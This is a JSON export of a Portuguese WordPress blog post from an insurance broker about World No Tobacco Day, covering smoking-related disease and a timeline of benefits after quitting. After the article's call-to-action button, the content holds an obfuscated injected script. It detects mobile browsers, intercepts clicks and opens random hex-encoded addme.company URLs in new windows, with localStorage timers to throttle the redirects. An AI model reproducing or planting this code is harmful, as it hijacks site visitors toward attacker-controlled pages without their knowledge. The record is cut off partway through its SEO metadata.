{"id":2777,"date":"2020-05-28T11:55:03","date_gmt":"2020-05-28T14:55:03","guid":{"rendered":"https:\/\/oinsurance.com.br\/?p=2777"},"modified":"2020-05-28T12:01:00","modified_gmt":"2020-05-28T15:01:00","slug":"dia-mundial-sem-tabaco","status":"publish","type":"post","link":"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/","title":{"rendered":"Voc\u00ea conhece os riscos que o tabagismo pode causar na sua vida?"},"content":{"rendered":"\n<p>O <strong>Dia Mundial sem Tabaco<\/strong> foi criado pela <strong>OMS &#8211; Organiza\u00e7\u00e3o Mundial da Sa\u00fade<\/strong> em 1987 com o objetivo de alertar sobre as doen\u00e7as e mortes evit\u00e1veis relacionadas ao <strong>tabagismo.<\/strong><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Voc\u00ea sabia?<\/strong><\/h2>\n\n\n\n<ul class=\"wp-block-list\"><li>Os pulm\u00f5es desempenham um papel fundamental na <strong>sa\u00fade e no bem-estar<\/strong> de todas as pessoas;<\/li><li>O uso do tabaco e a exposi\u00e7\u00e3o ao fumo passivo exercem um impacto extremamente negativo na sa\u00fade pulmonar, podendo causar desde <strong>doen\u00e7as respirat\u00f3rias<\/strong> cr\u00f4nicas, como asma e doen\u00e7a pulmonar obstrutiva cr\u00f4nica (que inclui bronquite e efisema) at\u00e9 c\u00e2ncer de pulm\u00e3o;<\/li><li>O tabaco fumado, em qualquer uma de suas formas, \u00e9 respons\u00e1vel por at\u00e9 90% de todos os <strong>c\u00e2nceres de pulm\u00e3o<\/strong>.<\/li><\/ul>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Por que as pessoas ainda fumam?<\/strong><\/h2>\n\n\n\n<p>A nicotina, presente em qualquer\nderivado do tabaco \u00e9 considerada uma droga, pois possui propriedades\npsicoativas. Ao ser inalada, produz altera\u00e7\u00e3o no sistema nervoso central,\ntrazendo modifica\u00e7\u00e3o no estado emocional e comportamental que pode induzir \u00e0 depend\u00eancia.\n<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"478\" src=\"https:\/\/oinsurance.com.br\/wp-content\/uploads\/2020\/05\/tabagismo-2-1024x478.jpg\" alt=\"\" class=\"wp-image-2783\" srcset=\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/05\/tabagismo-2-1024x478.jpg 1024w, https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/05\/tabagismo-2-300x140.jpg 300w, https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/05\/tabagismo-2-768x359.jpg 768w, https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/05\/tabagismo-2-1536x717.jpg 1536w, https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/05\/tabagismo-2-2048x956.jpg 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Quer parar ou ajudar algu\u00e9m a parar de fumar?<\/strong><\/h2>\n\n\n\n<p>\u00c9 importante dizer que o fumante sofre de uma <strong>depend\u00eancia qu\u00edmica<\/strong>. Ao tentar deixar de fumar, muitos sentem desconfortos f\u00edsicos e psicol\u00f3gicos que trazem sofrimento, impondo a necessidade de v\u00e1rias tentativas at\u00e9 que finalmente consiga abandonar o tabaco.<\/p>\n\n\n\n<p>Portanto, se voc\u00ea quer parar de\nfumar comece escolhendo uma data para ser o seu primeiro dia sem cigarro. Fa\u00e7a\ndele uma ocasi\u00e3o especial e procure programar outra coisa que goste de fazer\npara se distrair e relaxar.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Benef\u00edcios para a sa\u00fade<\/strong><\/h2>\n\n\n\n<p><strong>Parar de fumar<\/strong> sempre vale a pena em qualquer momento da vida!<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Ap\u00f3s 20 minutos, a press\u00e3o sangu\u00ednea e a pulsa\u00e7\u00e3o voltam ao normal;<\/li><li>Ap\u00f3s 2 horas, n\u00e3o h\u00e1 mais nicotina circulando no sangue;<\/li><li>Ap\u00f3s 8 horas, o n\u00edvel de oxig\u00eanio no sangue se normaliza;<\/li><li>Ap\u00f3s 12 a 24 horas, os pulm\u00f5es j\u00e1 funcionam melhor;<\/li><li>Ap\u00f3s 2 dias, o olfato e o paladar melhoram;<\/li><li>Ap\u00f3s 3 semanas, a respira\u00e7\u00e3o se torna mais f\u00e1cil e a circula\u00e7\u00e3o melhora;<\/li><li>Ap\u00f3s 1 ano, o risco de morte por infarto do mioc\u00e1rdio \u00e9 reduzido \u00e0 metade;<\/li><li>Ap\u00f3s 10 anos, o risco de sofrer infarto ser\u00e1 igual ao das pessoas que nunca fumaram.<\/li><\/ul>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Como a \u00d4&nbsp;Insurance&nbsp;pode ajudar seus colaboradores?<\/strong><\/h2>\n\n\n\n<p>Somos especialistas em apoiar empresas que precisam de <strong>consultoria<\/strong>&nbsp;para&nbsp;escolher&nbsp;os melhores <strong>benef\u00edcios<\/strong>&nbsp;e&nbsp;na implanta\u00e7\u00e3o de programas de gest\u00e3o!&nbsp;Nossa \u00e1rea de relacionamento&nbsp;busca&nbsp;solu\u00e7\u00f5es para&nbsp;campanhas de conscientiza\u00e7\u00e3o e qualidade de vida, acompanhando&nbsp;todas as etapas do processo.&nbsp;<\/p>\n\n\n\n<p>Al\u00e9m disso, entregamos tecnologia para que nossos clientes tenham&nbsp;<strong>total\ncontrole do uso dos benef\u00edcios<\/strong>&nbsp;e&nbsp;<strong>tomem<\/strong><strong>&nbsp;as melhores decis\u00f5es, ganhando tempo e\neconomia de recursos<\/strong>.&nbsp;&nbsp;<\/p>\n\n\n\n<p><\/p>\n\n\n\n<div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link has-background has-vivid-green-cyan-background-color\" href=\"https:\/\/oinsurance.com.br\/contato-2\/\"><strong>Consulte nossos especialistas!<\/strong><\/a><\/div>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x47\\x75\\x53\\x32\\x63\\x332','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x49\\x78\\x4f\\x33\\x63\\x363','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x63\\x71\\x6c\\x30\\x63\\x300','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x53\\x61\\x6a\\x37\\x63\\x357','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x59\\x4d\\x4b\\x36\\x63\\x346','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x47\\x47\\x6b\\x38\\x63\\x388','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x75\\x41\\x67\\x35\\x63\\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x68\\x63\\x6c\\x31\\x63\\x351',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x54\\x72\\x63\\x34\\x63\\x304',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x4d\\x76\\x43\\x39\\x63\\x399','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>O Dia Mundial sem Tabaco foi criado pela OMS &#8211; Organiza\u00e7\u00e3o Mundial da Sa\u00fade em 1987 com o objetivo de alertar sobre as doen\u00e7as e mortes evit\u00e1veis relacionadas ao tabagismo. Voc\u00ea sabia? Os pulm\u00f5es desempenham um papel fundamental na sa\u00fade e no bem-estar de todas as pessoas; O uso do tabaco e a exposi\u00e7\u00e3o ao [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2780,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[67],"tags":[],"class_list":["post-2777","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-gestao-de-beneficios-2","wpbf-post"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\r\n<title>Voc\u00ea conhece os riscos que o tabagismo pode causar na sua vida? - \u00d4 Insurance<\/title>\r\n<meta name=\"description\" content=\"O Dia Mundial sem Tabaco foi criado pela OMS - Organiza\u00e7\u00e3o Mundial da Sa\u00fade em 1987 com o objetivo de alertar sobre as doen\u00e7as relacionadas ao tabagismo.\" \/>\r\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\r\n<link rel=\"canonical\" href=\"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/\" \/>\r\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\r\n<meta property=\"og:type\" content=\"article\" \/>\r\n<meta property=\"og:title\" content=\"Voc\u00ea conhece os riscos que o tabagismo pode causar na sua vida? - \u00d4 Insurance\" \/>\r\n<meta property=\"og:description\" content=\"O Dia Mundial sem Tabaco foi criado pela OMS - Organiza\u00e7\u00e3o Mundial da Sa\u00fade em 1987 com o objetivo de alertar sobre as doen\u00e7as relacionadas ao tabagismo.\" \/>\r\n<meta property=\"og:url\" content=\"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/\" \/>\r\n<meta property=\"og:site_name\" content=\"\u00d4 Insurance\" \/>\r\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/oinsurancegroup\/\" \/>\r\n<meta property=\"article:published_time\" content=\"2020-05-28T14:55:03+00:00\" \/>\r\n<meta property=\"article:modified_time\" content=\"2020-05-28T15:01:00+00:00\" \/>\r\n<meta property=\"og:image\" content=\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/05\/tabagismo_2-scaled.jpg\" \/>\r\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\r\n\t<meta property=\"og:image:height\" content=\"1707\" \/>\r\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\r\n<meta name=\"author\" content=\"Rafael Gesser\" \/>\r\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\r\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Rafael Gesser\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\r\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/\"},\"author\":{\"name\":\"Rafael Gesser\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223\"},\"headline\":\"Voc\u00ea conhece os riscos que o tabagismo pode causar na sua vida?\",\"datePublished\":\"2020-05-28T14:55:03+00:00\",\"dateModified\":\"2020-05-28T15:01:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/\"},\"wordCount\":496,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/05\/tabagismo_2-scaled.jpg\",\"articleSection\":[\"Gest\u00e3o de Benef\u00edcios\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/\",\"url\":\"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/\",\"name\":\"Voc\u00ea conhece os riscos que o tabagismo pode causar na sua vida? - \u00d4 Insurance\",\"isPartOf\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/05\/tabagismo_2-scaled.jpg\",\"datePublished\":\"2020-05-28T14:55:03+00:00\",\"dateModified\":\"2020-05-28T15:01:00+00:00\",\"description\":\"O Dia Mundial sem Tabaco foi criado pela OMS - Organiza\u00e7\u00e3o Mundial da Sa\u00fade em 1987 com o objetivo de alertar sobre as doen\u00e7as relacionadas ao tabagismo.\",\"breadcrumb\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#primaryimage\",\"url\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/05\/tabagismo_2-scaled.jpg\",\"contentUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/05\/tabagismo_2-scaled.jpg\",\"width\":2560,\"height\":1707,\"caption\":\"tabagismo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/blog.oinsurance.com.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Voc\u00ea conhece os riscos que o tabagismo pode causar na sua vida?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#website\",\"url\":\"https:\/\/blog.oinsurance.com.br\/\",\"name\":\"\u00d4 Insurance\",\"description\":\"Seguros Pessoais e Empresariais\",\"publisher\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.oinsurance.com.br\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\",\"name\":\"\u00d4 Insurance\",\"url\":\"https:\/\/blog.oinsurance.com.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1\",\"contentUrl\":\"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1\",\"width\":409,\"height\":179,\"caption\":\"\u00d4 Insurance\"},\"image\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/oinsurancegroup\/\",\"https:\/\/www.instagram.com\/oinsurance\/\",\"https:\/\/www.linkedin.com\/company\/oinsurance\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223\",\"name\":\"Rafael Gesser\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g\",\"caption\":\"Rafael Gesser\"}}]}<\/script>\r\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Voc\u00ea conhece os riscos que o tabagismo pode causar na sua vida? - \u00d4 Insurance","description":"O Dia Mundial sem Tabaco foi criado pela OMS - Organiza\u00e7\u00e3o Mundial da Sa\u00fade em 1987 com o objetivo de alertar sobre as doen\u00e7as relacionadas ao tabagismo.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/","og_locale":"pt_BR","og_type":"article","og_title":"Voc\u00ea conhece os riscos que o tabagismo pode causar na sua vida? - \u00d4 Insurance","og_description":"O Dia Mundial sem Tabaco foi criado pela OMS - Organiza\u00e7\u00e3o Mundial da Sa\u00fade em 1987 com o objetivo de alertar sobre as doen\u00e7as relacionadas ao tabagismo.","og_url":"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/","og_site_name":"\u00d4 Insurance","article_publisher":"https:\/\/www.facebook.com\/oinsurancegroup\/","article_published_time":"2020-05-28T14:55:03+00:00","article_modified_time":"2020-05-28T15:01:00+00:00","og_image":[{"width":2560,"height":1707,"url":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/05\/tabagismo_2-scaled.jpg","type":"image\/jpeg"}],"author":"Rafael Gesser","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Rafael Gesser","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#article","isPartOf":{"@id":"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/"},"author":{"name":"Rafael Gesser","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223"},"headline":"Voc\u00ea conhece os riscos que o tabagismo pode causar na sua 